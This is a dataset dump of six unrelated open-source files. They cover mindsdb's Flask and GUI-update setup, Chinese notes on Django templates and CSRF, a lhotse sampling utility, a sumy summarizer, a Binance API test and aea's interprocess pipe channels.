max_stars_repo_path | max_stars_repo_name | max_stars_count | id | content
---|---|---|---|---|
mindsdb/api/http/initialize.py | mindsdb/main | 261 | 17263 | from distutils.version import LooseVersion
import requests
import os
import shutil
import threading
import webbrowser
from zipfile import ZipFile
from pathlib import Path
import traceback
import tempfile
# import concurrent.futures
from flask import Flask, url_for, make_response
from flask.json import dumps
from flask_restx import Api
from mindsdb.__about__ import __version__ as mindsdb_version
from mindsdb.interfaces.datastore.datastore import DataStore
from mindsdb.interfaces.model.model_interface import ModelInterface
from mindsdb.interfaces.database.integrations import IntegrationController
from mindsdb.utilities.ps import is_pid_listen_port, wait_func_is_true
from mindsdb.utilities.telemetry import inject_telemetry_to_static
from mindsdb.utilities.config import Config
from mindsdb.utilities.log import get_log
from mindsdb.interfaces.storage.db import session
from mindsdb.utilities.json_encoder import CustomJSONEncoder
class Swagger_Api(Api):
"""
This is a modification of the base Flask Restplus Api class due to the issue described here
https://github.com/noirbizarre/flask-restplus/issues/223
"""
@property
def specs_url(self):
return url_for(self.endpoint("specs"), _external=False)
def custom_output_json(data, code, headers=None):
resp = make_response(dumps(data), code)
resp.headers.extend(headers or {})
return resp
def get_last_compatible_gui_version() -> LooseVersion:
log = get_log('http')
try:
res = requests.get('https://mindsdb-web-builds.s3.amazonaws.com/compatible-config.json', timeout=5)
except (ConnectionError, requests.exceptions.ConnectionError) as e:
        print(f'No connection. {e}')
        return False
    except Exception as e:
        print(f'Something went wrong while getting compatible-config.json: {e}')
        return False
    if res.status_code != 200:
        print(f"Can't get compatible-config.json: returned status code = {res.status_code}")
        return False
    try:
        versions = res.json()
    except Exception as e:
        print(f"Can't decode compatible-config.json: {e}")
        return False
current_mindsdb_lv = LooseVersion(mindsdb_version)
try:
gui_versions = {}
max_mindsdb_lv = None
max_gui_lv = None
for el in versions['mindsdb']:
if el['mindsdb_version'] is None:
gui_lv = LooseVersion(el['gui_version'])
else:
mindsdb_lv = LooseVersion(el['mindsdb_version'])
gui_lv = LooseVersion(el['gui_version'])
if mindsdb_lv.vstring not in gui_versions or gui_lv > gui_versions[mindsdb_lv.vstring]:
gui_versions[mindsdb_lv.vstring] = gui_lv
if max_mindsdb_lv is None or max_mindsdb_lv < mindsdb_lv:
max_mindsdb_lv = mindsdb_lv
if max_gui_lv is None or max_gui_lv < gui_lv:
max_gui_lv = gui_lv
all_mindsdb_lv = [LooseVersion(x) for x in gui_versions.keys()]
all_mindsdb_lv.sort()
if current_mindsdb_lv.vstring in gui_versions:
gui_version_lv = gui_versions[current_mindsdb_lv.vstring]
elif current_mindsdb_lv > all_mindsdb_lv[-1]:
gui_version_lv = max_gui_lv
else:
lower_versions = {key: value for key, value in gui_versions.items() if LooseVersion(key) < current_mindsdb_lv}
if len(lower_versions) == 0:
gui_version_lv = gui_versions[all_mindsdb_lv[0].vstring]
else:
all_lower_versions = [LooseVersion(x) for x in lower_versions.keys()]
gui_version_lv = gui_versions[all_lower_versions[-1].vstring]
except Exception as e:
log.error(f'Error in compatible-config.json structure: {e}')
return False
return gui_version_lv
def get_current_gui_version() -> LooseVersion:
config = Config()
static_path = Path(config['paths']['static'])
version_txt_path = static_path.joinpath('version.txt')
current_gui_version = None
if version_txt_path.is_file():
with open(version_txt_path, 'rt') as f:
current_gui_version = f.readline()
current_gui_lv = None if current_gui_version is None else LooseVersion(current_gui_version)
return current_gui_lv
def download_gui(destination, version):
    if isinstance(destination, str):
        destination = Path(destination)
    log = get_log('http')
    dist_zip_path = str(destination.joinpath('dist.zip'))
    bucket = "https://mindsdb-web-builds.s3.amazonaws.com/"
    resources = [{
        'url': bucket + 'dist-V' + version + '.zip',
        'path': dist_zip_path
    }]
    def get_resources(resource):
        response = requests.get(resource['url'])
        if response.status_code != requests.status_codes.codes.ok:
            raise Exception(f"Error {response.status_code} GET {resource['url']}")
        open(resource['path'], 'wb').write(response.content)
    try:
        for r in resources:
            get_resources(r)
    except Exception as e:
        log.error(f'Error while downloading files from s3: {e}')
        return False
    static_folder = destination
    static_folder.mkdir(mode=0o777, exist_ok=True, parents=True)
    ZipFile(dist_zip_path).extractall(static_folder)
    if static_folder.joinpath('dist').is_dir():
        shutil.move(str(destination.joinpath('dist').joinpath('index.html')), static_folder)
        shutil.move(str(destination.joinpath('dist').joinpath('assets')), static_folder)
        shutil.rmtree(destination.joinpath('dist'))
    os.remove(dist_zip_path)
    version_txt_path = destination.joinpath('version.txt')  # os.path.join(destination, 'version.txt')
    with open(version_txt_path, 'wt') as f:
        f.write(version)
    return True
'''
# to make downloading faster download each resource in a separate thread
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
future_to_url = {executor.submit(get_resources, r): r for r in resources}
for future in concurrent.futures.as_completed(future_to_url):
res = future.result()
if res is not None:
raise res
'''
def initialize_static():
success = update_static()
session.close()
return success
def update_static():
    ''' Update Scout (GUI) files based on the compatible-config.json content.
        Files are downloaded and replaced if the new GUI version is greater than the current one.
        The current GUI version is stored in static/version.txt.
    '''
config = Config()
log = get_log('http')
static_path = Path(config['paths']['static'])
last_gui_version_lv = get_last_compatible_gui_version()
current_gui_version_lv = get_current_gui_version()
if last_gui_version_lv is False:
return False
if current_gui_version_lv is not None:
if current_gui_version_lv >= last_gui_version_lv:
return True
log.info(f'New version of GUI available ({last_gui_version_lv.vstring}). Downloading...')
temp_dir = tempfile.mkdtemp(prefix='mindsdb_gui_files_')
success = download_gui(temp_dir, last_gui_version_lv.vstring)
if success is False:
shutil.rmtree(temp_dir)
return False
temp_dir_for_rm = tempfile.mkdtemp(prefix='mindsdb_gui_files_')
shutil.rmtree(temp_dir_for_rm)
shutil.copytree(str(static_path), temp_dir_for_rm)
shutil.rmtree(str(static_path))
shutil.copytree(temp_dir, str(static_path))
shutil.rmtree(temp_dir_for_rm)
log.info(f'GUI version updated to {last_gui_version_lv.vstring}')
return True
def initialize_flask(config, init_static_thread, no_studio):
# Apparently there's a bug that causes the static path not to work if it's '/' -- https://github.com/pallets/flask/issues/3134, I think '' should achieve the same thing (???)
if no_studio:
app = Flask(
__name__
)
else:
static_path = os.path.join(config['paths']['static'], 'static/')
if os.path.isabs(static_path) is False:
static_path = os.path.join(os.getcwd(), static_path)
app = Flask(
__name__,
static_url_path='/static',
static_folder=static_path
)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 60
app.config['SWAGGER_HOST'] = 'http://localhost:8000/mindsdb'
app.json_encoder = CustomJSONEncoder
authorizations = {
'apikey': {
'type': 'session',
'in': 'query',
'name': 'session'
}
}
api = Swagger_Api(
app,
authorizations=authorizations,
security=['apikey'],
url_prefix=':8000',
prefix='/api',
doc='/doc/'
)
api.representations['application/json'] = custom_output_json
port = config['api']['http']['port']
host = config['api']['http']['host']
    # NOTE: rewrite this; it is a hotfix to show the GUI link
if not no_studio:
log = get_log('http')
if host in ('', '0.0.0.0'):
url = f'http://127.0.0.1:{port}/'
else:
url = f'http://{host}:{port}/'
log.info(f' - GUI available at {url}')
pid = os.getpid()
x = threading.Thread(target=_open_webbrowser, args=(url, pid, port, init_static_thread, config['paths']['static']), daemon=True)
x.start()
return app, api
def initialize_interfaces(app):
app.original_data_store = DataStore()
app.original_model_interface = ModelInterface()
app.original_integration_controller = IntegrationController()
config = Config()
app.config_obj = config
def _open_webbrowser(url: str, pid: int, port: int, init_static_thread, static_folder):
"""Open webbrowser with url when http service is started.
If some error then do nothing.
"""
init_static_thread.join()
inject_telemetry_to_static(static_folder)
logger = get_log('http')
try:
is_http_active = wait_func_is_true(func=is_pid_listen_port, timeout=10,
pid=pid, port=port)
if is_http_active:
webbrowser.open(url)
except Exception as e:
logger.error(f'Failed to open {url} in webbrowser with exception {e}')
logger.error(traceback.format_exc())
session.close()
|
14Django/day04/BookManager/introduction1.py | HaoZhang95/PythonAndMachineLearning | 937 | 17267 |
"""
模板语言:
{{ 变量 }}
{% 代码段 %}
{% 一个参数时:变量|过滤器, Book.id | add: 1 <= 2 当前id+1来和2比较
两个参数时:变量|过滤器:参数 %}, 过滤器最多只能传2个参数,过滤器用来对传入的变量进行修改
{% if book.name|length > 4 %} 管道|符号的左右不能有多余的空格,否则报错,其次并不是name.length而是通过管道来过滤
{{ book.pub_date|date:'Y年m月j日' }} 日期的转换管道
"""
"""
CSRF 跨站请求伪造, 盗用别人的信息,以你的名义进行恶意请求
比如:服务器返回一个表单进行转账操作,再把转账信息返回给服务器。
需要判断发送转账信息请求的客户端是不是刚才获取表单界面的客户端,防止回送请求的修改,和返回页面的修改(表单地址被修改为黑客地址,信息丢失)
防止CSRF需要服务器做安全验证
"""
"""
验证码主要用来防止暴力请求,原理就是请求页面之前生成一个动态不同的验证码写入到session中
用户登录的时候,会拿着填写的验证码和session中的验证码比较进行验证
""" |
lhotse/dataset/sampling/utils.py | stachu86/lhotse | 353 | 17269 | import warnings
from typing import Dict, Tuple
from lhotse import CutSet
from lhotse.dataset.sampling.base import CutSampler
def find_pessimistic_batches(
sampler: CutSampler, batch_tuple_index: int = 0
) -> Tuple[Dict[str, CutSet], Dict[str, float]]:
"""
Function for finding 'pessimistic' batches, i.e. batches that have the highest potential
to blow up the GPU memory during training. We will fully iterate the sampler and record
the most risky batches under several criteria:
- single longest cut
- single longest supervision
- largest batch cuts duration
- largest batch supervisions duration
- max num cuts
- max num supervisions
    .. note:: It is up to the users to convert the sampled CutSets into actual batches and test them
by running forward and backward passes with their model.
Example of how this function can be used with a PyTorch model
and a :class:`~lhotse.dataset.K2SpeechRecognitionDataset`::
sampler = SingleCutSampler(cuts, max_duration=300)
dataset = K2SpeechRecognitionDataset()
batches, scores = find_pessimistic_batches(sampler)
for reason, cuts in batches.items():
try:
                batch = dataset[cuts]
outputs = model(batch)
loss = loss_fn(outputs)
loss.backward()
except:
print(f"Exception caught when evaluating pessimistic batch for: {reason}={scores[reason]}")
raise
:param sampler: An instance of a Lhotse :class:`.CutSampler`.
:param batch_tuple_index: Applicable to samplers that return tuples of :class:`~lhotse.cut.CutSet`.
Indicates which position in the tuple we should look up for the CutSet.
:return: A tuple of dicts: the first with batches (as CutSets) and the other with criteria values, i.e.:
``({"<criterion>": <CutSet>, ...}, {"<criterion>": <value>, ...})``
"""
criteria = {
"single_longest_cut": lambda cuts: max(c.duration for c in cuts),
"single_longest_supervision": lambda cuts: max(
sum(s.duration for s in c.supervisions) for c in cuts
),
"largest_batch_cuts_duration": lambda cuts: sum(c.duration for c in cuts),
"largest_batch_supervisions_duration": lambda cuts: sum(
s.duration for c in cuts for s in c.supervisions
),
"max_num_cuts": len,
"max_num_supervisions": lambda cuts: sum(
1 for c in cuts for _ in c.supervisions
),
}
try:
sampler = iter(sampler)
first_batch = next(sampler)
if isinstance(first_batch, tuple):
first_batch = first_batch[batch_tuple_index]
except StopIteration:
warnings.warn("Empty sampler encountered in find_pessimistic_batches()")
return {}, {}
top_batches = {k: first_batch for k in criteria}
top_values = {k: fn(first_batch) for k, fn in criteria.items()}
for batch in sampler:
if isinstance(batch, tuple):
batch = batch[batch_tuple_index]
for crit, fn in criteria.items():
val = fn(batch)
if val > top_values[crit]:
top_values[crit] = val
top_batches[crit] = batch
return top_batches, top_values
|
aqg/utils/summarizer.py | Sicaida/Automatic_Question_Generation | 134 | 17284 |
from __future__ import absolute_import
from __future__ import division, print_function, unicode_literals
from sumy.parsers.html import HtmlParser
from sumy.parsers.plaintext import PlaintextParser
from sumy.nlp.tokenizers import Tokenizer
#from sumy.summarizers.lsa import LsaSummarizer as Summarizer
from sumy.summarizers.lex_rank import LexRankSummarizer as Summarizer
from sumy.nlp.stemmers import Stemmer
from sumy.utils import get_stop_words
class TextSummarizer:
def __init__(self, count=10):
self.LANGUAGE = "czech"
self.SENTENCES_COUNT = count
def summarize_from_url(self,url):
parser = HtmlParser.from_url(url, Tokenizer(self.LANGUAGE))
stemmer = Stemmer(self.LANGUAGE)
summarizer = Summarizer(stemmer)
file_1 = open("summarizer_output.txt","w+")
file_2 = open("summarizer_output2.txt","w+")
for sentence in summarizer(parser.document, self.SENTENCES_COUNT):
file_2.write(str(sentence))
file_1.write(str(sentence))
file_1.write("\n")
file_1.close()
file_2.close()
def summarize_from_text(self,text):
parser = PlaintextParser.from_string(text, Tokenizer(self.LANGUAGE))
stemmer = Stemmer(self.LANGUAGE)
summarizer = Summarizer(stemmer)
file_1 = open("summarizer_output.txt","w+")
file_2 = open("summarizer_output2.txt","w+")
for sentence in summarizer(parser.document, self.SENTENCES_COUNT):
file_2.write(str(sentence))
file_1.write(str(sentence))
file_1.write("\n")
file_1.close()
file_2.close()
def summarize_from_file(self,file_name):
parser = PlaintextParser.from_file(file_name, Tokenizer(self.LANGUAGE))
stemmer = Stemmer(self.LANGUAGE)
summarizer = Summarizer(stemmer)
file_1 = open("summarizer_output.txt","w+")
file_2 = open("summarizer_output2.txt","w+")
for sentence in summarizer(parser.document, self.SENTENCES_COUNT):
file_2.write(str(sentence))
file_1.write(str(sentence))
file_1.write("\n")
file_1.close()
file_2.close()
# t = TextSummarizer()
# t.summarize_from_file("obama_short.txt")
# pdf = pdfgeneration()
# pdf.generate_pdf_summarizer("summarizer_output2.txt")
|
tests/spot/sub_account/test_sub_account_deposit_address.py | Banging12/binance-connector-python | 512 | 17308 |
import responses
from tests.util import random_str
from tests.util import mock_http_response
from binance.spot import Spot as Client
from binance.lib.utils import encoded_string
from binance.error import ParameterRequiredError
mock_item = {"key_1": "value_1", "key_2": "value_2"}
key = random_str()
secret = random_str()
params = {
"email": "<EMAIL>",
"coin": "BNB",
"network": "BNB",
"recvWindow": 1000,
}
def test_sub_account_deposit_address_without_email():
"""Tests the API endpoint to get deposit address without email"""
params = {"email": "", "coin": "BNB", "network": "BNB", "recvWindow": 1000}
client = Client(key, secret)
client.sub_account_deposit_address.when.called_with(**params).should.throw(
ParameterRequiredError
)
def test_sub_account_deposit_address_without_coin():
"""Tests the API endpoint to get deposit address without coin"""
params = {
"email": "<EMAIL>",
"coin": "",
"network": "BNB",
"recvWindow": 1000,
}
client = Client(key, secret)
client.sub_account_deposit_address.when.called_with(**params).should.throw(
ParameterRequiredError
)
@mock_http_response(
responses.GET,
"/sapi/v1/capital/deposit/subAddress\\?" + encoded_string(params),
mock_item,
200,
)
def test_sub_account_deposit_address():
"""Tests the API endpoint to get deposit address"""
client = Client(key, secret)
response = client.sub_account_deposit_address(**params)
response.should.equal(mock_item)
|
aea/helpers/pipe.py | bryanchriswhite/agents-aea | 126 | 17340 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""Portable pipe implementation for Linux, MacOS, and Windows."""
import asyncio
import errno
import logging
import os
import socket
import struct
import tempfile
from abc import ABC, abstractmethod
from asyncio import AbstractEventLoop
from asyncio.streams import StreamWriter
from shutil import rmtree
from typing import IO, Optional
from aea.exceptions import enforce
_default_logger = logging.getLogger(__name__)
PIPE_CONN_TIMEOUT = 10.0
PIPE_CONN_ATTEMPTS = 10
TCP_SOCKET_PIPE_CLIENT_CONN_ATTEMPTS = 5
class IPCChannelClient(ABC):
"""Multi-platform interprocess communication channel for the client side."""
@abstractmethod
async def connect(self, timeout: float = PIPE_CONN_TIMEOUT) -> bool:
"""
Connect to communication channel
:param timeout: timeout for other end to connect
:return: connection status
"""
@abstractmethod
async def write(self, data: bytes) -> None:
"""
        Write `data` bytes to the other end of the channel.
        Will first write the size, then the actual data.
:param data: bytes to write
"""
@abstractmethod
async def read(self) -> Optional[bytes]:
"""
        Read bytes from the other end of the channel.
        Will first read the size, then the actual data.
:return: read bytes
"""
@abstractmethod
async def close(self) -> None:
"""Close the communication channel."""
class IPCChannel(IPCChannelClient):
"""Multi-platform interprocess communication channel."""
@property
@abstractmethod
def in_path(self) -> str:
"""
Rendezvous point for incoming communication.
:return: path
"""
@property
@abstractmethod
def out_path(self) -> str:
"""
Rendezvous point for outgoing communication.
:return: path
"""
class PosixNamedPipeProtocol:
"""Posix named pipes async wrapper communication protocol."""
def __init__(
self,
in_path: str,
out_path: str,
logger: logging.Logger = _default_logger,
loop: Optional[AbstractEventLoop] = None,
) -> None:
"""
Initialize a new posix named pipe.
:param in_path: rendezvous point for incoming data
:param out_path: rendezvous point for outgoing data
:param logger: the logger
:param loop: the event loop
"""
self.logger = logger
self._loop = loop
self._in_path = in_path
self._out_path = out_path
self._in = -1
self._out = -1
self._stream_reader = None # type: Optional[asyncio.StreamReader]
self._reader_protocol = None # type: Optional[asyncio.StreamReaderProtocol]
self._fileobj = None # type: Optional[IO[str]]
self._connection_attempts = PIPE_CONN_ATTEMPTS
self._connection_timeout = PIPE_CONN_TIMEOUT
async def connect(self, timeout: float = PIPE_CONN_TIMEOUT) -> bool:
"""
Connect to the other end of the pipe
:param timeout: timeout before failing
:return: connection success
"""
if self._loop is None:
self._loop = asyncio.get_event_loop()
self._connection_timeout = timeout / PIPE_CONN_ATTEMPTS if timeout > 0 else 0
if self._connection_attempts <= 1: # pragma: no cover
return False
self._connection_attempts -= 1
self.logger.debug(
"Attempt opening pipes {}, {}...".format(self._in_path, self._out_path)
)
self._in = os.open(self._in_path, os.O_RDONLY | os.O_NONBLOCK | os.O_SYNC)
try:
self._out = os.open(self._out_path, os.O_WRONLY | os.O_NONBLOCK)
except OSError as e: # pragma: no cover
if e.errno == errno.ENXIO:
self.logger.debug("Sleeping for {}...".format(self._connection_timeout))
await asyncio.sleep(self._connection_timeout)
return await self.connect(timeout)
raise e
# setup reader
enforce(
self._in != -1 and self._out != -1 and self._loop is not None,
"Incomplete initialization.",
)
self._stream_reader = asyncio.StreamReader(loop=self._loop)
self._reader_protocol = asyncio.StreamReaderProtocol(
self._stream_reader, loop=self._loop
)
self._fileobj = os.fdopen(self._in, "r")
await self._loop.connect_read_pipe(
lambda: self.__reader_protocol, self._fileobj
)
return True
@property
def __reader_protocol(self) -> asyncio.StreamReaderProtocol:
"""Get reader protocol."""
if self._reader_protocol is None:
raise ValueError("reader protocol not set!") # pragma: nocover
return self._reader_protocol
async def write(self, data: bytes) -> None:
"""
Write to pipe.
:param data: bytes to write to pipe
"""
self.logger.debug("writing {}...".format(len(data)))
size = struct.pack("!I", len(data))
os.write(self._out, size + data)
await asyncio.sleep(0.0)
async def read(self) -> Optional[bytes]:
"""
Read from pipe.
:return: read bytes
"""
if self._stream_reader is None: # pragma: nocover
raise ValueError("StreamReader not set, call connect first!")
try:
self.logger.debug("waiting for messages (in={})...".format(self._in_path))
buf = await self._stream_reader.readexactly(4)
if not buf: # pragma: no cover
return None
size = struct.unpack("!I", buf)[0]
if size <= 0: # pragma: no cover
return None
data = await self._stream_reader.readexactly(size)
if not data: # pragma: no cover
return None
return data
except asyncio.IncompleteReadError as e: # pragma: no cover
self.logger.info(
"Connection disconnected while reading from pipe ({}/{})".format(
len(e.partial), e.expected
)
)
return None
except asyncio.CancelledError: # pragma: no cover
return None
async def close(self) -> None:
"""Disconnect pipe."""
self.logger.debug("closing pipe (in={})...".format(self._in_path))
if self._fileobj is None:
raise ValueError("Pipe not connected") # pragma: nocover
try:
# hack for MacOSX
size = struct.pack("!I", 0)
os.write(self._out, size)
os.close(self._out)
self._fileobj.close()
except OSError: # pragma: no cover
pass
await asyncio.sleep(0)
class TCPSocketProtocol:
"""TCP socket communication protocol."""
def __init__(
self,
reader: asyncio.StreamReader,
writer: asyncio.StreamWriter,
logger: logging.Logger = _default_logger,
loop: Optional[AbstractEventLoop] = None,
) -> None:
"""
Initialize the tcp socket protocol.
:param reader: established asyncio reader
:param writer: established asyncio writer
:param logger: the logger
:param loop: the event loop
"""
self.logger = logger
self.loop = loop if loop is not None else asyncio.get_event_loop()
self._reader = reader
self._writer = writer
@property
def writer(self) -> StreamWriter:
"""Get a writer associated with protocol."""
return self._writer
async def write(self, data: bytes) -> None:
"""
Write to socket.
:param data: bytes to write
"""
if self._writer is None:
raise ValueError("writer not set!") # pragma: nocover
self.logger.debug("writing {}...".format(len(data)))
size = struct.pack("!I", len(data))
self._writer.write(size + data)
await self._writer.drain()
async def read(self) -> Optional[bytes]:
"""
Read from socket.
:return: read bytes
"""
try:
self.logger.debug("waiting for messages...")
buf = await self._reader.readexactly(4)
if not buf: # pragma: no cover
return None
size = struct.unpack("!I", buf)[0]
data = await self._reader.readexactly(size)
if not data: # pragma: no cover
return None
if len(data) != size: # pragma: no cover
raise ValueError(
f"Incomplete Read Error! Expected size={size}, got: {len(data)}"
)
return data
except asyncio.IncompleteReadError as e: # pragma: no cover
self.logger.info(
"Connection disconnected while reading from pipe ({}/{})".format(
len(e.partial), e.expected
)
)
return None
except asyncio.CancelledError: # pragma: no cover
return None
async def close(self) -> None:
"""Disconnect socket."""
if self._writer.can_write_eof():
self._writer.write_eof()
await self._writer.drain()
self._writer.close()
wait_closed = getattr(self._writer, "wait_closed", None)
if wait_closed:
# in py3.6 writer does not have the coroutine
await wait_closed() # pragma: nocover
class TCPSocketChannel(IPCChannel):
"""Interprocess communication channel implementation using tcp sockets."""
def __init__(
self,
logger: logging.Logger = _default_logger,
loop: Optional[AbstractEventLoop] = None,
) -> None:
"""Initialize tcp socket interprocess communication channel."""
self.logger = logger
self._loop = loop
self._server = None # type: Optional[asyncio.AbstractServer]
self._connected = None # type: Optional[asyncio.Event]
self._sock = None # type: Optional[TCPSocketProtocol]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("127.0.0.1", 0))
s.listen(1)
self._port = s.getsockname()[1]
s.close()
async def connect(self, timeout: float = PIPE_CONN_TIMEOUT) -> bool:
"""
Setup communication channel and wait for other end to connect.
:param timeout: timeout for the connection to be established
:return: connection status
"""
if self._loop is None:
self._loop = asyncio.get_event_loop()
self._connected = asyncio.Event()
self._server = await asyncio.start_server(
self._handle_connection, host="127.0.0.1", port=self._port
)
if self._server.sockets is None:
raise ValueError("Server sockets is None!") # pragma: nocover
self._port = self._server.sockets[0].getsockname()[1]
self.logger.debug("socket pipe rdv point: {}".format(self._port))
try:
await asyncio.wait_for(self._connected.wait(), timeout)
except asyncio.TimeoutError: # pragma: no cover
return False
self._server.close()
await self._server.wait_closed()
return True
async def _handle_connection(
self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter
) -> None:
"""Handle connection."""
if self._connected is None:
raise ValueError("Connected is None!") # pragma: nocover
self._connected.set()
self._sock = TCPSocketProtocol(
reader, writer, logger=self.logger, loop=self._loop
)
async def write(self, data: bytes) -> None:
"""
Write to channel.
:param data: bytes to write
"""
if self._sock is None:
raise ValueError("Socket pipe not connected.") # pragma: nocover
await self._sock.write(data)
async def read(self) -> Optional[bytes]:
"""
Read from channel.
:return: read bytes
"""
if self._sock is None:
raise ValueError("Socket pipe not connected.") # pragma: nocover
return await self._sock.read()
async def close(self) -> None:
"""Disconnect from channel and clean it up."""
if self._sock is None:
raise ValueError("Socket pipe not connected.") # pragma: nocover
await self._sock.close()
@property
def in_path(self) -> str:
"""Rendezvous point for incoming communication."""
return str(self._port)
@property
def out_path(self) -> str:
"""Rendezvous point for outgoing communication."""
return str(self._port)
class PosixNamedPipeChannel(IPCChannel):
"""Interprocess communication channel implementation using Posix named pipes."""
def __init__(
self,
logger: logging.Logger = _default_logger,
loop: Optional[AbstractEventLoop] = None,
) -> None:
"""Initialize posix named pipe interprocess communication channel."""
self.logger = logger
self._loop = loop
self._pipe_dir = tempfile.mkdtemp()
self._in_path = "{}/process_to_aea".format(self._pipe_dir)
self._out_path = "{}/aea_to_process".format(self._pipe_dir)
# setup fifos
self.logger.debug(
"Creating pipes ({}, {})...".format(self._in_path, self._out_path)
)
if os.path.exists(self._in_path):
os.remove(self._in_path) # pragma: no cover
if os.path.exists(self._out_path):
os.remove(self._out_path) # pragma: no cover
os.mkfifo(self._in_path)
os.mkfifo(self._out_path)
self._pipe = PosixNamedPipeProtocol(
self._in_path, self._out_path, logger=logger, loop=loop
)
async def connect(self, timeout: float = PIPE_CONN_TIMEOUT) -> bool:
"""
Setup communication channel and wait for other end to connect.
:param timeout: timeout for connection to be established
:return: bool, indicating success
"""
if self._loop is None:
self._loop = asyncio.get_event_loop()
return await self._pipe.connect(timeout)
async def write(self, data: bytes) -> None:
"""
Write to the channel.
:param data: data to write to channel
"""
await self._pipe.write(data)
async def read(self) -> Optional[bytes]:
"""
Read from the channel.
:return: read bytes
"""
return await self._pipe.read()
async def close(self) -> None:
"""Close the channel and clean it up."""
await self._pipe.close()
rmtree(self._pipe_dir)
@property
def in_path(self) -> str:
"""Rendezvous point for incoming communication."""
return self._in_path
@property
def out_path(self) -> str:
"""Rendezvous point for outgoing communication."""
return self._out_path
class TCPSocketChannelClient(IPCChannelClient):
"""Interprocess communication channel client using tcp sockets."""
def __init__( # pylint: disable=unused-argument
self,
in_path: str,
out_path: str,
logger: logging.Logger = _default_logger,
loop: Optional[AbstractEventLoop] = None,
) -> None:
"""
Initialize a tcp socket communication channel client.
:param in_path: rendezvous point for incoming data
:param out_path: rendezvous point for outgoing data
:param logger: the logger
:param loop: the event loop
"""
self.logger = logger
self._loop = loop
parts = in_path.split(":")
if len(parts) == 1:
self._port = int(in_path)
self._host = "127.0.0.1"
else: # pragma: nocover
self._port = int(parts[1])
self._host = parts[0]
self._sock = None # type: Optional[TCPSocketProtocol]
self._attempts = TCP_SOCKET_PIPE_CLIENT_CONN_ATTEMPTS
self._timeout = PIPE_CONN_TIMEOUT / self._attempts
self.last_exception: Optional[Exception] = None
async def connect(self, timeout: float = PIPE_CONN_TIMEOUT) -> bool:
"""
Connect to the other end of the communication channel.
:param timeout: timeout for connection to be established
:return: connection status
"""
if self._loop is None:
self._loop = asyncio.get_event_loop()
self._timeout = timeout / TCP_SOCKET_PIPE_CLIENT_CONN_ATTEMPTS
self.logger.debug(
"Attempting to connect to {}:{}.....".format("127.0.0.1", self._port)
)
connected = False
while self._attempts > 0:
self._attempts -= 1
try:
self._sock = await self._open_connection()
connected = True
break
except ConnectionRefusedError:
await asyncio.sleep(self._timeout)
except Exception as e: # pylint: disable=broad-except # pragma: nocover
self.last_exception = e
return False
return connected
async def _open_connection(self) -> TCPSocketProtocol:
reader, writer = await asyncio.open_connection(
self._host, self._port, loop=self._loop, # pylint: disable=protected-access
)
return TCPSocketProtocol(reader, writer, logger=self.logger, loop=self._loop)
async def write(self, data: bytes) -> None:
"""
Write data to channel.
:param data: bytes to write
"""
if self._sock is None:
raise ValueError("Socket pipe not connected.") # pragma: nocover
await self._sock.write(data)
async def read(self) -> Optional[bytes]:
"""
Read data from channel.
:return: read bytes
"""
if self._sock is None:
raise ValueError("Socket pipe not connected.") # pragma: nocover
return await self._sock.read()
async def close(self) -> None:
"""Disconnect from communication channel."""
if self._sock is None:
raise ValueError("Socket pipe not connected.") # pragma: nocover
await self._sock.close()
class PosixNamedPipeChannelClient(IPCChannelClient):
"""Interprocess communication channel client using Posix named pipes."""
def __init__(
self,
in_path: str,
out_path: str,
logger: logging.Logger = _default_logger,
loop: Optional[AbstractEventLoop] = None,
) -> None:
"""
Initialize a posix named pipe communication channel client.
:param in_path: rendezvous point for incoming data
:param out_path: rendezvous point for outgoing data
:param logger: the logger
:param loop: the event loop
"""
self.logger = logger
self._loop = loop
self._in_path = in_path
self._out_path = out_path
self._pipe = None # type: Optional[PosixNamedPipeProtocol]
self.last_exception: Optional[Exception] = None
async def connect(self, timeout: float = PIPE_CONN_TIMEOUT) -> bool:
"""
Connect to the other end of the communication channel.
:param timeout: timeout for connection to be established
:return: connection status
"""
if self._loop is None:
self._loop = asyncio.get_event_loop()
self._pipe = PosixNamedPipeProtocol(
self._in_path, self._out_path, logger=self.logger, loop=self._loop
)
try:
return await self._pipe.connect()
except Exception as e: # pragma: nocover # pylint: disable=broad-except
self.last_exception = e
return False
async def write(self, data: bytes) -> None:
"""
Write data to channel.
:param data: bytes to write
"""
if self._pipe is None:
raise ValueError("Pipe not connected.") # pragma: nocover
await self._pipe.write(data)
async def read(self) -> Optional[bytes]:
"""
Read data from channel.
:return: read bytes
"""
if self._pipe is None:
raise ValueError("Pipe not connected.") # pragma: nocover
return await self._pipe.read()
async def close(self) -> None:
"""Disconnect from communication channel."""
if self._pipe is None:
raise ValueError("Pipe not connected.") # pragma: nocover
return await self._pipe.close()
def make_ipc_channel(
logger: logging.Logger = _default_logger, loop: Optional[AbstractEventLoop] = None
) -> IPCChannel:
"""
Build a portable bidirectional InterProcess Communication channel
:param logger: the logger
:param loop: the loop
:return: IPCChannel
"""
if os.name == "posix":
return PosixNamedPipeChannel(logger=logger, loop=loop)
if os.name == "nt": # pragma: nocover
return TCPSocketChannel(logger=logger, loop=loop)
raise NotImplementedError( # pragma: nocover
"make ipc channel is not supported on platform {}".format(os.name)
)
def make_ipc_channel_client(
in_path: str,
out_path: str,
logger: logging.Logger = _default_logger,
loop: Optional[AbstractEventLoop] = None,
) -> IPCChannelClient:
"""
Build a portable bidirectional InterProcess Communication client channel
:param in_path: rendezvous point for incoming communication
    :param out_path: rendezvous point for outgoing communication
    :param logger: the logger
    :param loop: the loop
    :return: IPCChannelClient
"""
if os.name == "posix":
return PosixNamedPipeChannelClient(in_path, out_path, logger=logger, loop=loop)
if os.name == "nt": # pragma: nocover
return TCPSocketChannelClient(in_path, out_path, logger=logger, loop=loop)
raise NotImplementedError( # pragma: nocover
"make ip channel client is not supported on platform {}".format(os.name)
)
